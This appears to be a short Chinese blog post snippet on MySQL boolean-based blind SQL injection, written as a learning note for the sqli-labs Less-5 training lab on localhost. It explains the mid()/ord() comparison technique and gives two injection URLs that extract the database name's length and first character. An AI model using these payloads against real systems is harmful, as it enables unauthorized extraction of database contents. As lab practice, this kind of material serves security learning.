- 博客(1)
- 收藏
- 关注
原创 MYSQL布尔注入
MYSQL布尔注入 原理为利用mid()获取字符,利用ord()将字符转为ASCII码,利用>、<和=来确定字符的范围。 获取数据库名长度 http://127.0.0.1/sql/sqli-labs/Less-5/?id=1’ and 1>2 or length(database())=8# 获取数据库名 http://127.0.0.1/sql/sqli-labs/Less-5/?id=1’ and 1>2 or ord(mid(database(),1,1))=115.
2020-09-16 19:21:59 422
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人